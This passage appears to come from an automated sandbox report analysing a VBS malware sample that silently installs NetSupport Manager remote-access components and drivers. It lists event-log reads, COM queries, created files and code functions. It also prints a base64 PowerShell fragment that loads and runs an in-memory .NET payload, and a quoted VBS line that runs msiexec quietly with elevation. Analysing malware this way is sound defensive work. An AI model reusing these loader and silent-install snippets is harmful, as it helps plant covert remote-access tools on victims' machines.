B3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=Jump to behavior

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Reads the Security eventlog
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                Reads the System eventlog
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                                System Summary

                                barindex
                                Potential malicious VBS script found (suspicious strings)
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: shell.ShellExecute "msiexec.exe", "/i """ & targetFile & """ /quiet", "", "runas", 1Jump to dropped file
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B280C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,28_2_00B280C0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B24420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,28_2_00B24420
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2D040 ExitWindowsEx,28_2_00B2D040
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00494420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,30_2_00494420
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049D040 ExitWindowsEx,30_2_0049D040
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,32_2_001B4420
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BD040 ExitWindowsEx,32_2_001BD040
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sysJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3b1425.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1AFB.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1B79.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1BA9.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1BC9.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1C08.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1C29.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{CBB68368-7767-4CFF-B3E5-211488346702}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DD0.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DF0.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E3F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E6F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E8F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1ECF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1EEF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F1F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F4F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F7E.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FBE.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FDE.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI201E.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI204E.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI207D.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI209E.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20BE.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20DE.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20FE.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI211F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI213F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI215F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI219F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI21BF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI21DF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI222E.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23B6.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23F5.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2435.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2465.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2485.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI24C5.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2504.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI25E0.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2610.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI264F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI291F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI294F.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29BD.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B06.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B65.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B95.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2BE4.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2E95.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FCC.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4C31.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3b1428.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3b1428.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI51A0.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI51C1.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI57BD.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI68D5.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6914.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6963.tmpJump to behavior
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\SysWOW64\pcimsg.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\setupact.log
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\setuperr.log
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\SysWOW64\drivers\Msft_Kernel_nskbfltr_01005.Wdf
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\client32provider.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr2.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\loca[1].htm
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches
                                Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI1AFB.tmpJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 3_2_0B8DF5883_2_0B8DF588
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 3_2_0B8C00073_2_0B8C0007
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 3_2_0B8C00403_2_0B8C0040
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B0013028_2_00B00130
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B0415028_2_00B04150
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B543A628_2_00B543A6
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B4E33C28_2_00B4E33C
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B5E49928_2_00B5E499
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B5C64228_2_00B5C642
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B3486028_2_00B34860
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B6096128_2_00B60961
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B5CB9328_2_00B5CB93
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2CB7028_2_00B2CB70
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AF8C7028_2_00AF8C70
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2108028_2_00B21080
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B5D0E428_2_00B5D0E4
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B3B00028_2_00B3B000
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AFF4C028_2_00AFF4C0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AFB6F028_2_00AFB6F0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B5D77728_2_00B5D777
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B5D9F228_2_00B5D9F2
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B1FAD028_2_00B1FAD0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B21B1028_2_00B21B10
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B5DCF128_2_00B5DCF1
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B3BDEC28_2_00B3BDEC
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AEFD0028_2_00AEFD00
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0047415030_2_00474150
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0047013030_2_00470130
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004BE33C30_2_004BE33C
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004C43A630_2_004C43A6
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004CE49930_2_004CE499
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004CC64230_2_004CC642
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004A486030_2_004A4860
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004D096130_2_004D0961
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049CB7030_2_0049CB70
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004CCB9330_2_004CCB93
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00468C7030_2_00468C70
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004AB00030_2_004AB000
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004CD0E430_2_004CD0E4
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049108030_2_00491080
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0046F4C030_2_0046F4C0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0046B6F030_2_0046B6F0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004CD77730_2_004CD777
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004CD9F230_2_004CD9F2
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0048FAD030_2_0048FAD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00491B1030_2_00491B10
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004CDCF130_2_004CDCF1
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0045FD0030_2_0045FD00
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004ABDEC30_2_004ABDEC
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00E9FAE031_2_00E9FAE0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EB82BC31_2_00EB82BC
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EBE39E31_2_00EBE39E
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EC844D31_2_00EC844D
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00E845E031_2_00E845E0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EC65F831_2_00EC65F8
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00ECA53131_2_00ECA531
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EBE83331_2_00EBE833
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EBEBD131_2_00EBEBD1
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EC6B4731_2_00EC6B47
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00E74B1031_2_00E74B10
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EBEFA331_2_00EBEFA3
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EC709831_2_00EC7098
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EBF38B31_2_00EBF38B
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EA163031_2_00EA1630
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EC772B31_2_00EC772B
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EC79A631_2_00EC79A6
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00E9FAE031_2_00E9FAE0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00E81BD031_2_00E81BD0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EC7CA531_2_00EC7CA5
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BCB7032_2_001BCB70
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_00188C7032_2_00188C70
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BDDD032_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0019013032_2_00190130
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0019415032_2_00194150
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001DE33C32_2_001DE33C
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001E43A632_2_001E43A6
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001EE49932_2_001EE499
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001EC64232_2_001EC642
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001C486032_2_001C4860
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001F096132_2_001F0961
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001ECB9332_2_001ECB93
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001CB00032_2_001CB000
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B108032_2_001B1080
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001ED0E432_2_001ED0E4
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0018F4C032_2_0018F4C0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0018B6F032_2_0018B6F0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001ED77732_2_001ED777
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001ED9F232_2_001ED9F2
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001AFAD032_2_001AFAD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B1B1032_2_001B1B10
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001EDCF132_2_001EDCF1
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0017FD0032_2_0017FD00
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001CBDEC32_2_001CBDEC
                                Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Load Driver
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Security
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: String function: 00B39116 appears 64 times
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: String function: 00B491F9 appears 36 times
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: String function: 00B3DCC0 appears 81 times
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: String function: 00B2F030 appears 273 times
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: String function: 00B00C30 appears 322 times
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: String function: 00B3B3F0 appears 33 times
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: String function: 00B614E7 appears 61 times
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: String function: 001C9116 appears 59 times
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: String function: 001D91F9 appears 38 times
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: String function: 001CDCC0 appears 82 times
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: String function: 001BF030 appears 273 times
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: String function: 001CB3F0 appears 34 times
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: String function: 001F14E7 appears 61 times
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: String function: 00190C30 appears 318 times
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: String function: 00EB3CC3 appears 40 times
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: String function: 00EA8080 appears 77 times
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: String function: 00E72B26 appears 228 times
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 004A9116 appears 64 times
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 004B91F9 appears 36 times
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 004ADCC0 appears 81 times
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 004D14E7 appears 61 times
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 004AB3F0 appears 33 times
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 00470C30 appears 322 times
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 0049F030 appears 273 times
                                Source: Pyyidau.vbsInitial sample: Strings found which are bigger than 50
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4296 -ip 4296
                                Source: WdfCoInstaller01005.dll.22.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 1351826 bytes, 5 files, at 0x44 +A "Wdf01000.inf" +A "Wdf.cat", flags 0x4, ID 18394, number 1, extra bytes 20 in head, 62 datablocks, 0x1503 compression
                                Source: api-ms-win-core-processthreads-l1-1-1.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-profile-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-string-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-utility-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-stdio-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-multibyte-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-heap-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-handle-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-filesystem-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-2-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-sysinfo-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-timezone-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-namedpipe-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processenvironment-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-memory-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-runtime-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-process-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-private-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-conio-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-interlocked-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-time-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
